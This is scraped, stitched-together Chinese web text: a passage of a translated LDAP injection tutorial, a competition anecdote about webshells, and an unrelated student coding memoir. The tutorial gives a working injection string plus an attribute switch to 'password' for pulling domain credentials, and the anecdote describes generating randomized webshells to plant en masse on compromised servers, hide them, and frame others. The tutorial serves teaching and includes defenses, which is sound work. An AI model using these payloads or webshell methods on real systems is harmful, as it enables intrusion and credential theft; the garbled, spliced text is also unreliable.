zh-lightbox-thumb& width=&1431& data-original=&https://pic4.zhimg.com/v2-fb2c94358d2dff62a2f1cb_r.jpg&&&/figure&&p&然后我们只需点击提交按钮,OK,下面我们可以看到,我们操纵了正在发送的数据,目的是检索用户的密码哈希值。但是,这仍然不是LDAP注入,只是一个很糟糕的编码习惯,导致了在客户端代码中可以控制这些属性。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-e730ec42e5b5e5a48e82278_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1133& data-rawheight=&677& class=&origin_image zh-lightbox-thumb& width=&1133& data-original=&https://pic1.zhimg.com/v2-e730ec42e5b5e5a48e82278_r.jpg&&&/figure&&p&现在让我们看看是否可以将LDAP注入到查询中并操纵我们看到的结果。在这个演示中,我将简单地显示LDAP语句预注入(见下图)。请注意,在渗透测试中,你将不可能看到这些语句的源代码。在这些情况下,可能必须使用模糊测试和信息侦察来成功利用LDAP注入。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-1ddc9d281a6184eefccb178_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1318& data-rawheight=&30& class=&origin_image zh-lightbox-thumb& width=&1318& data-original=&https://pic1.zhimg.com/v2-1ddc9d281a6184eefccb178_r.jpg&&&/figure&&p&正如我们所看到的,开发者没有做任何类型的输入验证或过滤用户在连接之前传递的值。与SQL注入一样,查询的字符串连接也是危险的。使用LDAP库的大多数Web框架还提供了一种经过验证的方法,用于在查询之前转义和/或过滤用户提供的输入。如果在与目录数据库集成时使用LDAP,应始终利用这些安全的方法或功能。&/p&&p&在上面的查询中,有几件事情正在发生:&/p&&p&1. 我们的声明以逻辑或“|”开始 其中包括两个子语句。如果匹配到一个对象,那么该对象将返回所需的属性包含了&cn&,&sn&和&ou&。&/p&&p&2. 在第一个子语句中,我们执行了(&(&supplied
attribute&=&search term&)(department=finance))。这意味着我们可以搜索具有我们想要的任何属性和值的对象,但是该对象也必须属于财务部门。&/p&&p&3. 在第二个子语句中,我们执行了(&(&supplied
attribute&=&search term&)(department=sales))。这意味着我们可以搜索具有我们想要的任何属性和值的对象,但该对象也必须属于销售部门。&/p&&p&4. 通过将这两者结合在一起,开发人员正试图将搜索查询仅限于属于财务或销售部门的用户对象。&/p&&p&尽管窃取销售或财务人员的凭证可能具有不可估量的价值,但是能够获取到域管理员的凭证那当然是更好的了。所以,我们来制作一个利用这个制作精妙的查询的注入。例如,在将URL中所需的LDAP属性从“ cn ”更改为“ password ”后,我们可以将LDAP语法作为我们的搜索条件注入:&/p&&p&))(department=it)(|(cn=&/p&&p&这将改变我们的查询:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-1ddc9d281a6184eefccb178_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1318& data-rawheight=&30& class=&origin_image zh-lightbox-thumb& width=&1318& data-original=&https://pic1.zhimg.com/v2-1ddc9d281a6184eefccb178_r.jpg&&&/figure&&p&改为:&/p&&figure&&img src=&https://pic4.zhimg.com/v2-86ca02bd73_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1456& data-rawheight=&47& class=&origin_image zh-lightbox-thumb& width=&1456& data-original=&https://pic4.zhimg.com/v2-86ca02bd73_r.jpg&&&/figure&&p&这个语句现在可以查询我们的目录中的任何对象,这些对象需要包含:&/p&&p&1. 要有密码;&/p&&p&要么&/p&&p&2. 要属于“IT”部门;&/p&&p&要么&/p&&p&3. 要有任何规范的名称或在财务部门;&/p&&p&要么&/p&&p&4. 要有任何规范的名称或在销售部门。&/p&&p&当我们要利用LDAP注入时,用“OR”要比“AND”更好。&/p&&p&让我们试试这个新的查询:&/p&&figure&&img src=&https://pic4.zhimg.com/v2-86ca02bd73_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1456& data-rawheight=&47& class=&origin_image zh-lightbox-thumb& width=&1456& data-original=&https://pic4.zhimg.com/v2-86ca02bd73_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-c7f70c17f9f5e7499e36_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1152& data-rawheight=&824& class=&origin_image zh-lightbox-thumb& width=&1152& data-original=&https://pic3.zhimg.com/v2-c7f70c17f9f5e7499e36_r.jpg&&&/figure&&p&真棒!利用这个技巧,我们现在得到了域凭据。正如我们所看到的,修改属性并注入正确的LDAP语法能够使我们可以从目录中查询任何我们想要的内容。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-ee0f96ff814d4_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&250& data-rawheight=&170& data-thumbnail=&https://pic1.zhimg.com/v2-ee0f96ff814d4_b.jpg& class=&content_image& width=&250&&&/figure&&h2&&b&防御方法&/b&&/h2&&p&1. 始终使用框架提供的功能来正确的验证,过滤或转义用户提供的输入数据。&/p&&p&2. 不允许用户指定客户端的属性值。使用可由用户指定的存储值或服务器端功能。&/p&&p&3. 更好地格式化你的查询(以及其他预防方法)以防止被修改。例如,如果上面的语句已被更改为&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ca9b6f52ad_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&709& data-rawheight=&31& class=&origin_image zh-lightbox-thumb& width=&709& data-original=&https://pic2.zhimg.com/v2-ca9b6f52ad_r.jpg&&&/figure&&p&那么攻击者要查询到财务或销售部门的数据将是相当困难的。再次,适当的查询结构并不足以保护其本身。&/p&&p&4. 如果有问题的框架不提供验证,过滤或转义这些值的方法,请尽量通过正则表达式,存储过程或其他一些输入验证方法过滤用户提供的输入。但是,自定义方法只能作为最后的手段,应该由其他开发人员或安全专业人员验证其准确性。&/p&&h2&&b&其他说明&/b&&/h2&&p&1. 在渗透测试中,你将不可能获得有关目录数据库的源代码和信息。因此,适当的侦察和模糊测试是比较关键的。&/p&&p&2. 你可能有权访问或无法修改属性。在这种情况下,你可能仅限于注入并仅从预定义的属性中检索信息。&/p&&p&3. LDAP也可以用来更新或删除一个目录数据库,所以在进行渗透测试时请一定要小心。&/p&&p&4. LDAP注入也可以用来绕过认证。具体内容请查看下面的OWASP文章的详细链接。&/p&&h2&&b&有关LDAP的一些比较有用的链接:&/b&&/h2&&p&· LDAP注入身份验证绕过:&a href=&http://link.zhihu.com/?target=https%3A//www.owasp.org/index.php/Testing_for_LDAP_Injection_%28OTG-INPVAL-006%29& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&owasp.org/index.php/Tes&/span&&span class=&invisible&&ting_for_LDAP_Injection_(OTG-INPVAL-006)&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&· OpenLDAP属性:&a href=&http://link.zhihu.com/?target=http%3A//www.zytrax.com/books/ldap/ape/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&zytrax.com/books/ldap/a&/span&&span class=&invisible&&pe/&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&· Ldap查询基础知识:&a href=&http://link.zhihu.com/?target=https%3A//technet.microsoft.com/en-us/library/aav%3Dexchg.65%29.aspx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&technet.microsoft.com/e&/span&&span class=&invisible&&n-us/library/aa996205(v=exchg.65).aspx&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&· Active Directory属性:&a href=&http://link.zhihu.com/?target=https%3A//msdn.microsoft.com/en-us/library/msv%3Dvs.85%29.aspx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&msdn.microsoft.com/en-u&/span&&span class=&invisible&&s/library/ms675090(v=vs.85).aspx&/span&&span class=&ellipsis&&&/span&&/a&&/p&&blockquote&本文翻译自:&a href=&http://link.zhihu.com/?target=https%3A//pen-testing.sans.org/blog//understanding-and-exploiting-web-based-ldap& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pen-testing.sans.org/bl&/span&&span class=&invisible&&og//understanding-and-exploiting-web-based-ldap&/span&&span class=&ellipsis&&&/span&&/a& ,如若转载,请注明原文地址: &a href=&http://link.zhihu.com/?target=http%3A//www.4hou.com/technology/9090.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&4hou.com/technology/909&/span&&span class=&invisible&&0.html&/span&&span class=&ellipsis&&&/span&&/a&
更多内容请关注“嘶吼专业版”——Pro4hou&/blockquote&
企业通常会部署Active Directory环境来管理域对象,如用户,组织,部门,计算机和打印机,并将此与自定义Web应用程序的增加结合起来,企业组织自然也希望将这两种技术集成在一起。这种集成是为了在域环境中创建最佳的集中式的身份验证方式,同时也提供了查…
首先要欢迎我的好兄弟&a href=&//www.zhihu.com/people/f803d63a7c210ddf32cf& data-hash=&f803d63a7c210ddf32cf& class=&member_mention& data-hovercard=&p$b$f803d63a7c210ddf32cf&&@xisigr&/a& 开通知乎,其实要论“猥琐流”,他是当之无愧的大家,谷歌浏览器的漏洞他都挖出了一排了。他那回答也挺有代表性,建议大伙儿看看 。&br&&br&讲一个可说的而且感觉非常猥琐的案例吧:&br&&br&那年单位要搞全国大比武,提前一个月通知我们,而且告知是AWD模式。这是第一次举办这样的比武,我们做了很多准备工作,每一项都猥琐至极。&br&&br&譬如我们写了一套脚本版的WAF,这套WAF除了正常的拦截过滤功能外,还多做了两件事。第一件就是配置了一个强力模式,这个模式下,所有GET、POST提交数据以及COOKIE等常见header里的字符串中的a和e等字母都将被replace掉了。这样既可以欺骗主办方的检测脚本,又能达到永不被getshell的目的。第二件事就是将所有请求都记录下来,并可以直接当做payload进行批量利用。重造轮子不就是浪费资源么,有写好的POC不用就太可惜了!&br&&br&另外一项准备工作就是webshell。我当时写了一套随机webshell生成脚本,生成结果如下图:&br&&figure&&img data-rawheight=&1280& src=&https://pic1.zhimg.com/v2-c5bbd578c7d3b605e02de08_b.jpg& data-rawwidth=&1707& class=&origin_image zh-lightbox-thumb& width=&1707& data-original=&https://pic1.zhimg.com/v2-c5bbd578c7d3b605e02de08_r.jpg&&&/figure&&br&这个webshell里面所有变量都是随机的,连连接密码都是随机的,基本上是无特征的,防止通过grep批量扫马,或者其他队伍连接自己的shell。生成脚本大概这样:&br&&figure&&img data-rawheight=&1280& src=&https://pic3.zhimg.com/v2-dea0ba7a4c88dac459696_b.jpg& data-rawwidth=&1707& class=&origin_image zh-lightbox-thumb& width=&1707& data-original=&https://pic3.zhimg.com/v2-dea0ba7a4c88dac459696_r.jpg&&&/figure&&br&和一般的webshell生成脚本不同,这个脚本是要扔到肉鸡服务器上运行,实现批量、动态、随机插马的。这里面有好几个比较猥琐的点:第一个就是获取web目录下所有PHP文件列表,将所有文件全都touch一遍,这样没办法判断哪个文件是修改过的,哪个不是;第二个是通过一个概率函数来抽签决定哪个文件要插马,哪个文件不插;第三个是生成极其相似的伪造文件,譬如原文件为page.php,那么伪造文件可能会是pages.php或page_list.php这种,至于如何生成也是随机的;第四个则是最猥琐的,这个webshell可以设置一个hacked by字符串,用于祸水东引。&br&&br&代码的鲁棒性比较强,我拿discuz代码做测试,即便概率设成100%,也没有丝毫影响。这样一旦脚本被执行,对方网站铺天盖地全是webshell,每一个都不一样,代码就只有重置的份了。&br&&br&当然这种玩法是半暴露式的,所以实际上我还准备其他一些没那么暴露的webshell,不仅过各种狗,过人都是没问题的,譬如下图:&br&&figure&&img data-rawheight=&1707& src=&https://pic2.zhimg.com/v2-6109d47effcbbfe83db5ad_b.jpg& data-rawwidth=&1280& class=&origin_image zh-lightbox-thumb& width=&1280& data-original=&https://pic2.zhimg.com/v2-6109d47effcbbfe83db5ad_r.jpg&&&/figure&&br&懂PHP的朋友你看看能看出来这是一个webshell么?
首先要欢迎我的好兄弟 开通知乎,其实要论“猥琐流”,他是当之无愧的大家,谷歌浏览器的漏洞他都挖出了一排了。他那回答也挺有代表性,建议大伙儿看看 。 讲一个可说的而且感觉非常猥琐的案例吧: 那年单位要搞全国大比武,提前一个月通知我们,而…
大学开始接触编程,年初生日的时候在寝室没事干,就研究了下怎么搭博客,然后不到一天时间搞了下, &a href=&//link.zhihu.com/?target=http%3A//windliang.cc& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&windliang.cc&/span&&span class=&invisible&&&/span&&/a& 。搞出后很有成就感,也很有感触。&br&&br&一直对应用方面的东西感兴趣。&br&&br&写过 C++ ,利用 MFC 写了单机和网络对战的贪吃蛇,但只能是局域网,毕竟当时连 socket 都不知道是什么。&br&&figure&&img data-rawwidth=&1707& data-rawheight=&1280& src=&https://pic3.zhimg.com/v2-6fbaaf00bdea57a74ff8a_b.jpg& class=&origin_image zh-lightbox-thumb& width=&1707& data-original=&https://pic3.zhimg.com/v2-6fbaaf00bdea57a74ff8a_r.jpg&&&/figure&&br&&br&写过安卓,和同学合作写了校园应用,可惜的是后来接口没了,下载量也有 3000+ 。&br&&figure&&img data-rawwidth=&1337& data-rawheight=&565& src=&https://pic2.zhimg.com/v2-0b2b3bddf23d989d07245_b.png& class=&origin_image zh-lightbox-thumb& width=&1337& data-original=&https://pic2.zhimg.com/v2-0b2b3bddf23d989d07245_r.png&&&/figure&&br&&br&写过 python ,利用爬虫写过充值接口,团队大佬接手过学校的企业号,放到企业号供同学使用,每日也有几百的请求率,累计请求数达几万。不过可惜的是学校后来也不让搞了。&br&&figure&&img data-rawwidth=&1017& data-rawheight=&566& src=&https://pic2.zhimg.com/v2-4ea83f86aa4ea26ca4c51_b.png& class=&origin_image zh-lightbox-thumb& width=&1017& data-original=&https://pic2.zhimg.com/v2-4ea83f86aa4ea26ca4c51_r.png&&&/figure&&br&&br&&br&玩过公众号,利用之前爬虫的基础,搭了一个查空教室的功能,现在在学校推广。&br&&figure&&img data-rawwidth=&750& data-rawheight=&1334& src=&https://pic3.zhimg.com/v2-b51d84fda79091a8eda6_b.png& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic3.zhimg.com/v2-b51d84fda79091a8eda6_r.png&&&/figure&&br&&br&写过 js ,为了怀念童年,也为了应付课设,写了 「狼吃羊」 对战游戏,&a href=&//link.zhihu.com/?target=http%3A//windliang.oschina.io/worfeatsheep/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&windliang.oschina.io/wo&/span&&span class=&invisible&&rfeatsheep/&/span&&span class=&ellipsis&&&/span&&/a& 。&br&&figure&&img data-rawwidth=&750& data-rawheight=&1334& src=&https://pic1.zhimg.com/v2-a52fb4a75c79bf3aa5588_b.png& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic1.zhimg.com/v2-a52fb4a75c79bf3aa5588_r.png&&&/figure&&br&&br&搞过科研,老师帮助下,对原有差分演化算法进行改进,实现算法,测试实验,另一种不同的乐趣。&br&&figure&&img data-rawwidth=&978& data-rawheight=&429& src=&https://pic2.zhimg.com/v2-15d8e951a1dacff27ba139_b.png& class=&origin_image zh-lightbox-thumb& width=&978& data-original=&https://pic2.zhimg.com/v2-15d8e951a1dacff27ba139_r.png&&&/figure&&br&&br&&br&写脚本帮人刷票,写脚本模拟签到,大大小小的事做了很多。&br&&br&&br&老师有一次问自己忙什么,自己说在写 APP,老师笑着说「写那些做什么呀?」当时不理解,现在越发的体会到,如果一直都是为了能做做表面的应用,那真的太简单了,尤其是现在,越来越多的库,越来越多的工具,做东西真的学会复制粘贴就够了。&br&&br&前段时间忙完了保研的事,现在准备学学英语,搞搞算法,研究下深度学习,提前进入研究生的生活。&br&&br&学的越多,越觉得自己渺小,佩服互联网的那些大佬们,只希望自己以后也能做出些什么贡献吧,越努力,越幸运,为自己加油!&br&&br&对了,还有最重要的是有了女朋友,&a href=&//link.zhihu.com/?target=http%3A//love.windliang.cc& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&love.windliang.cc&/span&&span class=&invisible&&&/span&&/a& 。
大学开始接触编程,年初生

我要回帖

更多关于 www.vv6g.com 的文章

 

随机推荐